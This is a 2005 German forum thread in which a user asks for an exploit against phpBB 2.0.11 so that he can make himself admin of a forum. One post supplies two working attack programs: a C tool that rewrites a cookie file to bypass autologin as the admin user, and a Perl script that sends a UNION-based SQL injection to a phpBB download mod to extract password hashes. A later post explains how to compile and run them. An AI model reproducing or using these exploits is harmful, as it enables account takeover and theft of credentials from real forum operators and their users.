Exploit für php BB 2.0.11

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Dark_Fenix, 10. Juli 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 10. Juli 2005
    Ich brauche ein Exploit für das php BB 2.0.11
    Wenn es jemand hat wäre cool wenn er es uppen könnte.
     

  2. Anzeige
  3. #2 10. Juli 2005
    hier kommt mal eine kleine dumme frage von mir , was ist ein exploit??
    ist das sowas wie ein tutorial??

    mfg
     
  4. #3 10. Juli 2005
    ~Moved~
     
  5. #4 10. Juli 2005
    Mit Programmen Oder "Tricks" Sich Ein Admin Zumachen.
    Oder Einfach.
    Ein System Übernehmen Dursch Sicherheitzlücken.
     
  6. #5 11. Juli 2005
    Gibts für diese Version überhaupt eins ???
     
  7. #6 11. Juli 2005
    Für php BB Habe Ich Noch Garkein Exploit Zeug In Die Finger Bekommen.

    Für PhpKit-PhpNuke Und Sowas Gibt Es Viele.

    M.F.G
     
  8. #7 11. Juli 2005
    Exploit ‡ Admin machen ^^

    Jedes Programm hat irgendwo exploits meistens unbewusst manchmal aber auch mit absicht des Coders um sich später Vorteile zu verschaffen.Ein exploit fürs phpbb könnte auch sein in Boards zukommen für die du garkeine Berechtigung hast.Soviel meinerseits zu exploits aber für diese Version kenne ich leider keine exploits.

    Greetz FrEeDoMe
     
  9. #8 11. Juli 2005
    voilà:

    <=2.0.12
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    char *search_and_replace (char *text, char *find, char *replace)
    {
    char *found,*new_text;
    int
    len_find=strlen(find),len_replace=strlen(replace),len_text=strlen(text),i=0,j=0;
    
    if((new_text=(char*)malloc(len_text+len_replace-len_find+1))==NULL)
     {
     printf("malloc issue...\n");
     return new_text;
     }
    found = strstr(text, find);
    while (i <= len_text)
    {
    if ( found != text + i )
     {
     new_text[j] = text[i];
     i++;
     j++;
     }
     else
     {
     strcat (new_text, replace);
     i += len_find;
     j += len_replace;
     found = strstr (text + i, find);
     }
     new_text[j] = '\0';
    }
    return new_text;
    }
    
    int main()
    {
     FILE * pFile;
     long lSize;
     char * buffer;
    
     pFile = fopen ( "cookies.txt" , "r" );
     if (pFile==NULL) exit (1);
    
     fseek (pFile , 0 , SEEK_END);
     lSize = ftell (pFile);
     rewind (pFile);
    
     buffer = (char*) malloc (lSize);
     if (buffer == NULL) exit (2);
     fread (buffer,1,lSize,pFile);
     fclose (pFile);
    
     pFile = fopen ( "cookies.txt" , "w" );
     fputs(search_and_replace((char *)buffer,"a%3A0%3A%7B%7D","a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"), pFile);
     fclose (pFile);
     free (buffer);
     return 0;
    
    }
    
    <=2.0.13
    Code:
    #!/usr/bin/perl -w
    use IO::Socket;
    
    ## Example:
    ## C:\>phpbb.pl www.site.com /phpBB2/ 2
    ##
    ## downloads.php mod in phpBB <= 2.0.13
    ## **********************************
    ## [~] Connecting...
    ## [+] Connected!
    ## [~] Sending Data...
    ## [~] Data Sent, Waiting for response...
    ## [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
    ##
    if (@ARGV < 3)
    {
    print "\n\n";
    print "|****************************************************************|\n";
    print " phpBB <=2.0.13 'downloads.php' Mod\n";
    print " Bug found by Axl And CereBrums\n";
    print " Coded by CereBrums // 2/4/2005\n";
    print " Usage: phpbb.pl <site> <folder> <user_id>\n";
    print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n";
    print " [~] <server> - site address\n";
    print " [~] <folder> - forum folder\n";
    print " [~] <user_id> - user id (2 default for phpBB admin)\n";
    print "|****************************************************************|\n";
    print "\n\n";
    exit(1);
    }
    
    $take = 0;
    $success = 0;
    $server = $ARGV[0];
    $folder = $ARGV[1];
    $user_id = $ARGV[2];
    print "\n downloads.php mod in phpBB <= 2.0.13\n";
    print " **********************************\n";
    print " [~] Connecting...\n";
    $socket = IO::Socket::INET->new(
    Proto => "tcp",
    PeerAddr => "$server",
    PeerPort => "80") || die "$socket error $!";
    
    print " [+] Connected\n";
    print " [~] Sending Data...\n";
    
    $path = "http://$server/";
    $path .= "/$folder/";
    $path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
    print $socket "GET $path HTTP/1.0\r\n\r\n";
    
    print " [~] Data Sent, Waiting for response...\n";
    
    while ($answer = <$socket>)
    {
     if ($take == 1) {
     $pass = substr($answer,51,32);
     print " [+] MD5 Hash for user with id=$user_id is: $pass\n";
     $success = 1;
     $take = 0;
     }
     $found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
     if ( $found > -1 ) {
     $take = 1;
     }
    }
    if ($success==0) {print " [-] Exploit failed\n";}
    
     
  10. #9 11. Juli 2005
    lol ok jetzt mal ne dumme frage von mir....

    wie benutzt man sowas??
     
  11. #10 11. Juli 2005
    1. c quellcode also compellieren
    2. Perl-Code also per Perlinterpreter ausführen.
     
  12. #11 17. August 2005
    und wo finde ich sowas ?
     

  13. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Exploit php
  1. Antworten:
    8
    Aufrufe:
    664
  2. Antworten:
    2
    Aufrufe:
    623
  3. Antworten:
    5
    Aufrufe:
    854
  4. Antworten:
    1
    Aufrufe:
    602
  5. phpbb exploit

    memphys , 14. Mai 2006 , im Forum: Sicherheit & Datenschutz
    Antworten:
    5
    Aufrufe:
    782